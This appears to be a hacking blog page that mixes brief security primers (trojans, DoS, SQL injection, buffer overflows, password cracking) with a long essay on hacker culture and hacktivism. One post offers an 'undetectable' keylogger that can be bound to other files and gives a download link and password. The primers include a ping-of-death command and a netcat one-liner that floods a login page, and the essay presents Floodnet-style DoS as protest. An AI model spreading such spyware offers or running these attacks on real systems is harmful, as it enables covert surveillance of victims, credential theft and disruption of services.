FREESPY4U: hacking

Showing posts with label hacking. Show all posts

-: Honeypots :-

Definition :-
"Honeypot is a trap set to detect, deflect, or in some manner counteract attempts at unauthorized use of information systems." -Wikipedia

"Honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource." -Lance Spitzner

Unlike firewalls or Intrusion Detection Systems, honeypots do not solve a specific problem. Instead, they are a highly flexible tool that comes in many shapes and sizes. They can do everything from detecting encrypted attacks in IPv6 networks to capturing the latest in on-line credit card fraud. Its is this flexibility that gives honeypots their true power. It is also this flexibility that can make them challenging to define and understand.

-: Intrusion Detection System (IDS) :-

An intrusion detection system (IDS) is software and/or hardware based system that monitors network traffic and monitors for suspicious activity and alerts the system or network administrator. In some cases the IDS may also respond to anomalous or malicious traffic by taking action such as blocking the user or source IP address from accessing the network.

Typical locations for an intrusion detection system is as shown in the following figure -

-: Steganography :-

The art and science of hiding information by embedding messages within other, seemingly harmless messages. Steganography works by replacing bits of useless or unused data in regular computer files (such as graphics, sound, text, HTML, or even floppy disks ) with bits of different, invisible information. This hidden information can be plain text, cipher text, or even images.

Some common files used for hiding the data are .jpeg, .bmp, .jpg, .bmp, .pdf, .mp3, .wav, .gif, etc.

-: Cryptography :-

By definition cryptography is the process of converting recognisable data into an encrypted code for transmitting it over a network (either trusted or untrusted). Data is encrypted at the source, i.e. sender's end and decrypted at the destination, i.e. receiver's end.

In all cases, the initial unencrypted data is referred to as plaintext. It is encrypted into ciphertext, which will in turn (usually) be decrypted into usable plaintext using different encryption algorithms.

VicSPY 2008 keylogger [Undetectable]

New VicSpy 2008 Keylogger is completely undetectable.
You can bind it with another file, perfectly works…..!
Download :
http://rapidshare.com/files/93069143/VicSpy2008_upped_by_AKEXOR_.rar
Password : crazy-coderz.net

-: Privacy Attacks :-

Here attacker uses various automated tools which are freely available on the internet. Some of them are as follows:

1) Trojan :- Trojan is a Remote Administration Tool (RAT) which enable attacker to execute various software and hardware instructions on the target system.

Most trojans consist of two parts -
a) The Server Part :- It has to be installed on the the victim's computer.
b) The Client Part :- It is installed on attacker's system. This part gives attacker complete control over target computer.

Netbus, Girlfriend, sub7, Beast, Back Orifice are some of the popular trojans.

-: Denial Of Service (DoS) Attacks :-

A denial of service (DoS) attack is an attack that clogs up so much memory on the target system that it can not serve it's users, or it causes the target system to crash, reboot, or otherwise deny services to legitimate users.There are several different kinds of dos attacks as discussed below:-

1) Ping Of Death :- The ping of death attack sends oversized ICMP datagrams (encapsulated in IP packets) to the victim.The Ping command makes use of the ICMP echo request and echo reply messages and it's commonly used to determine whether the remote host is alive. In a ping of death attack, however, ping causes the remote system to hang, reboot or crash. To do so the attacker uses, the ping command in conjuction with -l argument (used to specify the size of the packet sent) to ping the target system that exceeds the maximum bytes allowed by TCP/IP (65,536).
example:- c:/>ping -l 65540 hostname
Fortunately, nearly all operating systems these days are not vulnerable to the ping of death attack.

-: SQL Injection Attacks :-

What is SQL Injection?
SQL injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. Web pages which accepts parameters from user, and make SQL query to the database, are targeted. For Example, A web page with username and password, fires SQL query on the database to check whether a user has entered valid name and/or password or not. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.

-: Google Hacking :-

Basic Operators:-
1) And (+) :- This operator is used to include multiple terms in a query which is to be searched in google.
example:- if we type "hacker+yahoo+science" in google search box and click search, it will reveal the results something which are related to all the three words simultaneously i.e. hacker, yahoo and science.

2 ) OR (|) :- The OR operator, represented by symbol( | ) or simply the word OR in uppercase letters, instructs google to locate either one term or another term in a query.

3) NOT :- It is opposite of AND operator, a NOT operator excludes a word from search.
example:- If we want to search websites containing the terms google and hacking but not security then we enter the query like "google+hacking" NOT "security".

-: Input Validation Attacks :-

Input Validation Attacks are where an attacker intentionally sends unusual input in the hopes of confusing the application.
The most common input validation attacks are as follows-

1) Buffer Overflow :- Buffer overflow attacks are enabled due to sloppy programming or mismanagement of memory by the application developers. Buffer overflow may be classified into stack overflows, format string overflows, heap overflows and integer overflows. It may possible that an overflow may exist in language’s (php, java, etc.) built-in functions.
To execute a buffer overflow attack, you merely dump as much data as possible into an input field. The attack is said to be successful when it returns an application error. Perl is well suited for conducting this type of attack.
Here’s the buffer test, calling on Perl from the command line:
$ echo –e “GET /login.php?user=\
> `perl –e ‘print “a” x 500’`\nHTTP/1.0\n\n” | \
nc –vv website 80
This sends a string of 500 “a” characters for the user value to the login.php file.
Buffer overflow can be tested by sending repeated requests to the application and recording the server's response.

-: Wireless Hacking :-

Wireless networks broadcast their packets using radio frequency or optical wavelengths. A modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the fly and persuade wireless stations to accept his packets as legitimate.
The step by step procerdure in wireless hacking can be explained with help of different topics as follows:-

1) Stations and Access Points :- A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station.
An access point (AP) is a station that provides frame distribution service to stations associated with it.
The AP itself is typically connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage.

-: Password Hacking :-

Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.
Most passwords can be cracked by using following techniques :

1) Hashing :- Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords.
One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.
LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.

Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.

Conclusion

Conclusion

The word "hacker" carries weight. People strongly disagree as to what a hacker is. Hacking may be defined as legal or illegal, ethical or unethical. The media’s portrayal of hacking has boosted one version of discourse. The conflict between discourses is important for our understanding of computer hacking subculture. Also, the outcome of the conflict may prove critical in deciding whether or not our society and institutions remain in the control of a small elite or we move towards a radical democracy (a.k.a. socialism). It is my hope that the hackers of the future will move beyond their limitations (through inclusion of women, a deeper politicization, and more concern for recruitment and teaching) and become hacktivists. They need to work with non-technologically based and technology-borrowing social movements (like most modern social movements who use technology to do their task more easily) in the struggle for global justice. Otherwise the non-technologically based social movements may face difficulty continuing to resist as their power base is eroded while that of the new technopower elite is growing – and the fictionesque cyberpunk-1984 world may become real.

Limitations to Resistance

Limitations to Resistance

The master's tools will never destroy the master's house.

(Audre Lorde in Sister Outsider)

The institutions that are in power create the technology that helps them.

(Kirkpatrick Sale, qtd. in Robin 1996)

What limitations are there to hacking as a source of resistance? Structurally Sale argues that the technology in the computer revolution is designed to be undemocratic. He thinks we should take a Luddite position and reject the digital revolution. He pessimistically forecasts that the elite will win the fight for technopower. The statistics on inequality in Internet use back him up.
More critically, the illegal hackers, who meet the most accepted definition of hacker, show potential for resistance, but also major problems before that potential can be realized. Namely, overall hacker support for progressive causes outside of libertarian issues is shallow. While one might expect hackers who by operating anonymously can be free of their sex, race, and sexual orientation to be very accepting of diversity ("We exist without skin color, without nationality, without religious bias..." – The Mentor), this is not the case. Probably 80-90% of hackers are male and they tend to act sexist. Phrack includes many letters that were generally accompanied by sarcastic editorial comments. If the letter-writer’s name or handle was female, then the editor would usually suggest that they "hook-up". In past summer conferences organized by hackers and Phrack, people hired strippers and watched pornography videos (along with drinking) as a form of entertainment. Women are generally treated as sex objects. Men who try to get help from more experienced hackers or phreaks have trouble, but women receive favorable treatment, probably in hope that they will return the favor. Phrack ragged on one hacker, Oryan Quest, for being a Mexican ("illegal alien") and using Spanish commands on his BBS. However as they also attacked him for a series of other things (Ex. to try and boost his reputation he filed fake news stories to Phrack) so one cannot know whether the editors were primarily motivated by racism or not.
Some hackers are more concerned about their status within the movement, than about building the movement. There is a lot of teaching happening in the underground with BBSes, webpages, electronic journals, files, and chat rooms; however hackers need to change their attitude. Instead of assuming that everyone who has an AOL account is a loser and kicking off an Internet Relay Chat channel anyone who asks a question (just because they seem a little new), hackers need to write a friendly response and bring the newcomers into hacking culture like other social movements do. By contrast, if a new person shows up at a National Council meeting of the Student Environmental Action Coalition (large national progressive student environmental network) they get a lot of attention and are welcomed into the fold. If they are willing, they will end up with a very high level of responsibility.

Hackers as Resistance (illegal and legal)

Hackers as Resistance (illegal and legal)

Hacking. It is a full time hobby, taking countless hours per week to learn, experiment, and execute the art of penetrating multi-user computers: Why do hackers spend a good portion of their time hacking? Some might say it is scientific curiosity, others that it is for mental stimulation. But the true roots of hacker motives run much deeper than that. In this file I will describe the underlying motives of the aware hackers, make known the connections between Hacking, Phreaking, Carding, and Anarchy, and make known the "techno-revolution" which is laying seeds in the mind of every hacker. . . And whatever you do, continue the fight. Whether you know it or not, if you are a hacker, you are a revolutionary. Don't worry, you're on the right side.
("Doctor Crash," 1986, Phrack 6)
In the beginning the military-industrial complex invented the Internet, and the generals looked upon the Internet and saw that it was an effective war-proof control structure. And as the military-industrial complex penetrated the halls of academia, the professors looked upon the Internet and saw that it was interesting. The professors showed it to their students, and the students looked upon the Internet and saw that it was brilliant. Then the student activists saw the Internet, and realised that it was capable of being subverted into a more socially useful purpose than a control structure for the military-industrial complex - and lo, the state lost control of the Internet!
(electrohippies : http://www.greennet.org.uk/ehippies/)
Are hackers revolutionaries? Some are. Part of the reason West German hackers (such as Pengo who was a punk and a Green) attempted to hack for the Russians (codename "Project Equalizer") was because they wanted to promote peace through reducing the West’s technical advantage. The 1960s New Left started Phreaking. Computer hackers and enthusiasts in general tend to be a mixture of libertarian, anarchist, and generally liberal. They are overwhelmingly opposed to authoritarian systems. Cyberpunk literature shows the individual using technology, somehow surviving in the midst of authoritarian structures.
More recently, "hacktivism" has emerged as people have learnt how to put their computer "in the way," instead of their body. Hacktivists have broken into websites to put a political message on the site (freeing computer hacker Kevin Mitnick, human rights in China, the Zapatistas, and East Timor have all been popular topics). Hacktivists invented the electronic sit-in. A program called "Floodnet" allows you to set your computer so that it is constantly requesting a webpage. Activists can cooperate from around the world, and if enough people join it will slow down the webpage, ultimately leading to a Denial of Service. In addition, it is possible to overload a target’s email account by sending them large attachments. Hacktivists flooded and email bombed the World Trade Organization during its meeting in Seattle.
It is also possible to legally use computers and the Internet to share information and build movements of resistance. The reduction of costs of communication helps both multi-national corporations and encourages the creation of a global alliance of anti-corporate resistance. For instance the student anti-sweatshop movement (United Students Against Sweatshops) has used an email list as its primary organizing tool and has arguably become the most cohesive and powerful progressive student movement in only two years.

Technopower

Technopower

[2600] holds that technical power and specialized knowledge, of any kind obtainable, belong by right in the hands of those individuals brave and bold enough to discover them--by whatever means necessary.

(Goldman qtd. in Sterling)

The economy of the developed world is moving from focussing on producing goods (Ex. cars, houses, food, and computers) to being based on the exchange of information. This shift may be compared to the transition from feudalism to capitalism where the power shifted away from the landed aristocracy to the newly enriched bourgeoisie. In this case, the power will shift from the owners of productive capital (a.k.a. factories) to those of informational capital. Already we have seen a strong shift away from productive capital, as speculative investments are able to wreck havoc on national economies (such as Mexico’s 1994 crisis and the recent Southeast Asian financial crisis). Each day over 1.5 trillion dollars is traded in international currency markets (UNDP: 1999). Thus capital is overwhelming the power of the state. For example, the World Trade Organization (WTO) is attempting to liberalize trade and permits corporations to challenge and change national laws by appealing to the WTO to rule that they are barriers to free trade. Despite the WTO’s recent failure at the protest-marred Seattle meeting, corporate sponsored globalization will march on.
Now if the economy is entering a new stage, then a new class will gain power. The new class could be called an "info-bourgeoisie." Sterling argues that hackers and their critics are fighting over "technopower." While access to computers has been growing, there is still great inequality. According to the 1998 study, "Falling Through the Net," families with incomes over $75,000 were five times more likely than those under $15,000 to have a computer and seven times more likely to use the Internet. Inequality is even worse if you include race. Only 1.9% of black families with income under $15,000 used the Internet, compared to 3.8% of Hispanic families and 8.9% of white ones.
Globally Internet usage was only 140 million people in mid-1998 (Human Development Report Office ctd. in UNDP), though expected to reach 700 million by 2001. There are many people who are not going to use the Internet for a very long time. The bottom 20% of nations only had 0.2% of Internet users, compared to 6.5% for the middle 60%, and a whopping 93.3% for the top 20%. So the difference between rich and poor is a ratio of 450.
Also even as more people gain access to the Internet there will still be vast inequality between users. For instance if you are a corporation and know how to market and design an effective website you will get thousands or more hits per day. By comparison, for two years my personal website was only visited once every several days. The World Wide Web was a medium where I could and did publish my opinions and research, however it did not matter as no one was reading. As more and more websites are created, search engines have started to rank sites by how many time other sites link to them. So if your website starts with a high-ranking on the search engine, more people will link to it, which will increase your search engine rank and so on (and vice-versly if no-one knows about your site, nobody will link to it, and it will never appear in the top hits for a search engine). This Internet-specific examples shows that an information or technopower based economy permits, and possibly promotes, inequality due to differences in technical knowledge, education, language, race, class, gender, and other factors.
In the software or "information management" market, Microsoft’s monopoly of the operating systems market and near-monopoly of the word processing and spreadsheet markets shows the danger of not questioning who owns the infrastructure of the developing information economy. The nostalgic discourse has a good argument when it says that the people collaborating to create one of Microsoft’s primary rival in operating systems, Linux, are hackers, if hackers are to be understood as individuals resisting monopolization of technopower. Though recently so-called "hackers" have been cashing-in big time by listing their Linux-related corporation on the stock market. On its first day of trading, stock in VA Linux Systems set a new record by soaring from its initial public offer price of $30 to $239 ¼.
What impact will the corporatization of the Internet (its growing use for e-commerce and the advertisements all over) have upon deciding whether it is used for resistance or to further domination? Will "free" mean "free because it comes with advertisements?" That is how it is for the free webpages, free email, free hard drive space, free phone calls (a couple companies offer free long distance which is interrupted for an ad every several minutes), free listservs, and free pirated software – all of which are being promoted for someone’s profit. Or will "free" be the start of a gift-giving, possibly post-capitalist and socialistic, economy? This is how it is with freeware like Linux and other programs, USENET, and discussion lists and webpages on nonprofit servers. Unfortunately, now Linux is also under threat of commercialization too. Is the Internet going to intensify capitalism by reducing transaction costs so that everyone can be an entrepreneur or will it help lead to socialism?

Media Discourse

Media Discourse

The media serves a similar role to the legal system. Its net effect is to sensationalize illegal hacking and thus has caused the nostalgic discourse to lose out in the battle for public opinion. And like the legal discourse, the media generally fails to distinguish between ethical and unethical hacking.
There are some differences within the media. As hacking and computers have become increasingly prevalent, the reporters who cover hacking are better informed and more immune to the hype (Ex. the War Games theme that a teen hacker could set-off a nuclear war). Some reporters and particularly segments of the computer-media, like the magazine Wired, will present a more sympathetic and realistic story about the dangers and motivations of computer hackers.
However, it is media coverage like the following examples which sets the tone. First, Eddie Schwarz, a WGN radio talk-show host, rebukes hacker / phreak "Anna" who openly admitted to stealing $15,000 worth of long distance:
You know what Anna, you know what disturbs me? You don't sound like a stupid person but you represent a . . . a . . . a . . . lack of morality that disturbs me greatly. You really do. I think you represent a certain way of thinking that is morally bankrupt. And I'm not trying to offend you, but I . . . I'm offended by you! (WGN Radio, 1988 – qtd. in Meyer)
Schwarz creates a moral boundary between normal society and hackers / phreaks – who apparently are maliciously causing financial damage without adhering to any ethical values. This boundary is necessary for the criminalization and marginalization of hackers. And here is an example from an NBC TV special on "computer crime," hosted by Gary Collins who is talking to Jay Bloombecker, director of the National Center for Computer Crime Data."
Collins: . . . are they [hackers] malicious in intent, or are they simply out to prove, ah, a certain machismo amongst their peers?
Bloombecker: I think so. I've talked about "modem macho" as one explanation for what's being done. And a lot of the cases seem to involve proving [sic] that he . . . can do something really spiffy with computers. But, some of the cases are so evil, like causing so many computers to break, they can't look at that as just trying to prove that you're better than other people.
GC: So that's just some of it, some kind of "bet" against the computer industry, or against the company.
JB: No, I think it's more than just rottenness. And like someone who uses graffiti doesn't care too much whose building it is, they just want to be destructive.
GC: You're talking about a sociopath in control of a computer!
JB: Ah, lots of computers, because there's thousands, or tens of thousands [of hackers]
(NBC-TV, 1988 – qtd. in Meyer).
The image of thousands of hackers working magic, penetrating every possible imagine computer system (the media covered successful attacks on military systems are the proof), whether it is coincidental or not, allows for pressure / repression to be brought to bear against hackers, conveniently ignoring the immense technical power that is being gathered and wielded by corporations and governments.

Problems with the Law Enforcement Discourse

Problems with the Law Enforcement Discourse

The legal discourse, in its attempts to figure out how to treat computer hackers yet often knowing very little about computers and/or hacking (especially judges and juries), fits it into the traditional criminal code. The problem with this approach is that computer hacker "crimes" can be qualitatively different from regular ones. For instance Prophet, a Legion of Doom member, hacked into a Bell South system and copied a file on the 911 system. Later he was charged with theft of a document valued at a highly inflated $79,449 for its approximately ten pages. He had not even stolen it. Bell South still had their original copy, and his document was of next to no value. In fact, this "stolen property" was distributed to thousands of people when it was edited and included in an issue of Phrack. Are they all guilty of a criminal offense? Another questionable parallel is that when a hacker gains access into a computer system it is treated like break and entry or trespassing. While in fact the actions of the white hat hackers are as if someone were to enter a house without breaking anything, read a couple books, and leave everything in such a condition that the house’s occupants will never realize or feel any loss from the intrusion. Not only that, but the hacker’s behavior inside the house is so low-key, that if you were to be home at the time of the intrusion you would likely not notice them.
The other major problem with the legal discourse is that it fails to distinguish between hackers who intend no harm and criminals. As an example, while questioning Emmanuel Goldstein, editor of 2600, chairman of the congressional committee Markey first wanted used the label "bad hacker," then twice insisted upon "crackers," and finally went with "criminal hackers," all while Goldstein insisted that the people in question were criminals. He does not even accept for them to be called the lesser term of "cracker." The criminals might be using hacker technology, but that does not make them hackers because they lack the values and technical knowledge.

Mr. MARKEY. ... What do we do about the bad hacker?
Mr. GOLDSTEIN. Well, I just would like to clarify something. We have heard here in testimony that there are gang members and drug members who are using this technology. Now, are we going to define them as hackers because they are using the technology?
Mr. MARKEY. Yes. Well, if you want to give them another name, fine. We will call them hackers and crackers, all right?
Mr. GOLDSTEIN. I think we should call them criminals.
Mr. MARKEY. So the crackers are bad hackers, all right? If you want another word for them, that is fine, but you have got the security of individuals decreasing with the sophistication of each one of these technologies, and the crackers are out there. What do we do with the crackers who buy your book?
Mr. GOLDSTEIN. I would not call them crackers. They are criminals. If they are out there doing something for their own benefit, selling information --
Mr. MARKEY. Criminal hackers. What do we do with them?
Mr. GOLDSTEIN. There are existing laws. Stealing is still stealing.
Mr. MARKEY. OK. Fine.
(Congressional Testimony qtd. from Phrack)
In summary, the legal discourse contradicts both the ethical hacker one by lumping all hackers together as criminals, and the nostalgic one by preferring the computer underground’s definition of hacking to the nostalgic one.

The Legal Discourse

The Legal Discourse

The culture of criminal hackers seems to glorify behavior which would be classified as sociopathic or frankly psychotic.

(Mich Kabay, director of education, NCSA, NCSA News, June 1996, qtd. in Phrack 48)

The law enforcement discourse simply argues that there are people who are causing financial loss to corporations and that their activity should be viewed as criminal. Some people are using hacker-knowledge to defraud credit card companies (Ex. infamous hacker/phreak Kevin Mitnick was convicted for stealing 20,000 credit card numbers), long distance companies, banks, and plant viruses or otherwise damage a company’s computer system. 1For a company that does not know who is accessing its network and cannot tell their intention, it makes sense to lump all hackers together and depict them as criminals.
Of course computer security companies who benefit from over-playing the hacker threat, are not helping to calm corporate fears:
Anti-hacker ad runs during Super Bowl XXXII. The Network Associates ad, costing $1.3-million for 30 seconds, shows two Russian missile silo crewmen worrying that a computer order to launch missiles may have come from a hacker. They decide to blow up the world anyway (Trigaux 1998).
Computer hacking is in a gray legal area. It is only since 1980 that computer hacking became illegal in every state (Hollinger and Lanza-Kaduce, 1988 - ctd in Meyer), but law officials have made up for their lack of activity with high profile raids such as those carried out in 1990 (see Sterling’s The Hacker Crackdown). In a May 9, 1990 press release, Mr. Jenkins, Asst. Dir. of the US Secret Service explained their newly found vigilance: "Our experience shows that many computer hacker suspects are no longer misguided teenagers, mischievously playing games with their computers in their bedrooms. Some are now high tech computer operators using computers to engage in unlawful conduct"(qtd. in Sterling).
With this kind of rhetoric aimed at hackers it is not surprising that Judge Stanton said the following while handing down an exemplary one year (and three years probation) sentence to hacker Phiber Obtik: "The defendant...stands as a symbol here today... Hacking crimes constitute a real threat to the expanding information highway" (qtd. in Dibbel 1994).

Law Enforcement and Computer Security Discourse

Law Enforcement and Computer Security Discourse
How Big is Hacking?

It would be good to know how common hacking is, to be able to understand why the computer security discourse sees it as a large problem. Unfortunately figures vary widely and are hard to estimate with accuracy. In 1990, Sterling estimated that there were five thousand hackers, of which a couple hundred were "elite." Clough and Mungo (1992, ctd. in Jordan and Taylor) estimated two thousand "really dedicated, experienced, probably obsessed computer freaks" and up to ten thousand less dedicated ones. The primary in-print hacking magazine, 2600: The Hacker Quarterly, had under three thousand subscribers in 1990. With increasing access to computers and rapid growth in the Internet, hacking has undoubtedly grown since then.
Most corporations have problems with hacking, and it likely increasing. The Computer Security Institute survey of over 500 companies, banks, universities and government agencies showed 64% having a problem with hacking in 1997 (with ¾ of the attacks causing a financial loss), compared to 48% in 1996 (ctd. in Van Slambrouck). Military targets are especially popular. According to the General Accounting Office, the Department of Defense was attacked as many as 250,000 times in 1995. Taylor’s 1993 survey of 200 organizations found 64.5% had been hacked, 18.5% only had a virus (probably introduced unintentionally), and 17% had no known activity (ctd. in Taylor and Jordan). He argued that hacking was likely underestimated in surveys as companies do not realize or do not want to admit that their security is lacking. A 1996 WarRoom survey of 236 organizations found that during the past year 58% had been hacked, 29.8% did not know, and 12.2% had no attacks (ctd. in Taylor and Jordan).
The increase in website hacking, as documented by www.attrition.org, is obviously exponential:

Year       Number of website defacements
1995       4
1996       18
1997       39
1998       194
1999       1905 (for the year up until 09/01/99) The financial loss is also very hard to quantify but estimated in the billions. Estimates from computer or telco (telephone company) security companies are often biased upwards. In congressional testimony, Mr. Haugh, who works for a private telco consultation firm estimated telephone fraud at $4 to$5 billion in 1993. Peter Tippet, of Symantec Corporation, testified that the cost of viruses to companies was $1 billion, between 1990 and 1993, and rapidly growing.

NOTE:

Click And BuyNow

weather

PAGES

Feedjit